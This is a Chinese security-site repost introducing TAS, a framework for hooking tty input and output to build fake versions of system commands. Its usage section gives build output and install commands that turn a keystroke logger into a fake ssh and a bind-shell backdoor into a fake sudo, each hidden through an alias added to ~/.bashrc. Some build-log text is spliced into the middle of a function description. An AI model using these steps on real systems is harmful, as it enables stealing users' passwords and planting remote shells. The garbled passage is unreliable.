当前位置：网站首页 > 网络安全培训 > 正文

TAS：一款轻量级tty修改与代码伪造框架

freebuf 2020-02-24 390 0

本文来源:Alpha_h4ck

TAS是一款轻量级框架，在它的帮助下，研究人员可以轻松修改tty并创建伪造的代码。

该框架拥有三个主要函数，即tas_execv、tas_forkpty和tas_tty_loop：

1、tas_execv：这个函数的作用跟execv类似，但是它并不会重新执行当前代码，这对于创建伪造代码来说非常有用；

2、tas_forkpty：这个函数跟forkpty一样，不过它会自动填充自定义结构体，检查forkpty操作页并获取详细信息；

3、tas_tty_loop：这个函数负责对tty进行修改操作，我们可以针对输入和输出数据设置钩子函数，这样就可以获取到用户输入的击键数据或修改终端输出结果（'/home/test/tas/fakebins/su' [+] configuring fakesu ... enable keylogger? [y/N] y number of lines to record [empty = store all]: logfile (default: /tmp/.keys.txt): use some FUN modules? [y/N] n [+] configuration file created in /home/test/tas/fakebins/su/config.h CC su make[1]: Leaving directory '/home/test/tas/fakebins/su'

工具使用样例

创建一个fakessh

编译：

$ make generic-keylogger make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger' [+] configuring generic-keylogger ... number of lines to record [empty = store all]: 3 logfile (default: /tmp/.keys.txt): [+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h   CC generic-keylogger make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'

安装：

$ mkdir ~/.bin $ cp generic-keylogger ~/.bin/ssh $ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc

演示：

使用bind-shell模块

编译：

make[1]: Entering directory '/home/test/tas/fakebins/sudo' [+] configuring fakesudo ... enable keylogger? [y/N] n use some FUN modules? [y/N] y [1] add-root-user [2] bind-shell [3] system [4] cancel > 2 listen port (Default: 1337): 5992 [+] configuration file created in /home/test/tas/fakebins/sudo/config.h   CC sudo make[1]: Leaving directory '/home/test/tas/fakebins/sudo'

安装：

$ cp sudo ~/.sudo $ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc

演示：

leet-shell

在leet-shell这个使用样例中，你可以修改tty输出，它将允许你使用bash（类似1337 h4x0r）：

[test@alfheim tas]$ make fun/leet-shell   CC fun/leet-shell [t3st@alfheim tas]$ fun/leet-shell SP4WN1NG L33T SH3LL H3R3 !!! [t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!' l33t sh3ll 1s l33t !!!